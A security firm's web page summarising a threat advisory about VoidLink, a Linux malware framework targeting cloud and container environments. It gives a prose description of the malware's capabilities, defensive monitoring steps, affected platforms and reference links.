top of page
perceptive_background_267k.jpg

New Advanced Linux VoidLink Malware Targets Cloud and container Environments

Published:

13 January 2026 at 11:57:00

Alert date:

13 January 2026 at 13:00:57

Source:

thehackernews.com

Click to open the original link from this advisory

Operating Systems, Cloud & Virtualization, Ransomware & Malware

Cybersecurity researchers have discovered VoidLink, a previously undocumented and sophisticated malware framework specifically designed to target Linux-based cloud and container environments. The malware is engineered for long-term, stealthy access and persistence in cloud infrastructure. VoidLink is described as a feature-rich, cloud-native framework that comprises custom loaders, implants, rootkits, and modular components. The malware represents an advanced threat to cloud security, particularly targeting containerized environments. Check Point Research published details about this new threat, highlighting its advanced capabilities and cloud-focused design.

Technical details

VoidLink is a feature-rich Linux malware framework written in the Zig programming language, designed for long-term stealthy access to cloud environments. The framework includes custom loaders, implants, rootkits, and 37+ modular plugins built around a custom Plugin API inspired by Cobalt Strike's Beacon Object Files (BOF). It can detect major cloud environments (AWS, Google Cloud, Azure, Alibaba, Tencent) and adapt behavior for Docker containers and Kubernetes pods. Features include rootkit capabilities using LD_PRELOAD, loadable kernel modules (LKM), and eBPF; multiple C2 channels (HTTP/HTTPS, WebSocket, ICMP, DNS tunneling); peer-to-peer mesh networking; anti-analysis features including debugger detection, self-deletion on tampering, and self-modifying code with runtime encryption/decryption. The malware calculates risk scores based on installed security products and adjusts evasion strategies accordingly.

Mitigation steps:

Monitor for signs of LD_PRELOAD abuse, loadable kernel module activity, and eBPF usage for process hiding. Implement enhanced monitoring for cloud environments and container ecosystems. Watch for unusual C2 communications over HTTP/HTTPS, WebSocket, ICMP, and DNS tunneling protocols. Monitor for credential harvesting activities targeting SSH keys, git credentials, browser data, tokens, and API keys. Be alert for lateral movement via SSH-based worm activity and unauthorized persistence mechanisms through dynamic linker abuse, cron jobs, and system services.

Affected products:

Linux-based cloud environments
Amazon Web Services (AWS)
Google Cloud
Microsoft Azure
Alibaba Cloud
Tencent Cloud
Docker containers
Kubernetes pods
Git version control systems

Related links:

https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/
https://ziglang.org
https://thehackernews.com/2023/03/cryptojacking-group-teamtnt-suspected.html
https://en.wikipedia.org/wiki/Loadable_kernel_module
https://thehackernews.com/2025/10/linkpro-linux-rootkit-uses-ebpf-to-hide.html

Related CVE's:

Related threat actors:

IOC's:

VoidLink malware framework, Chinese web-based dashboard for remote control

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page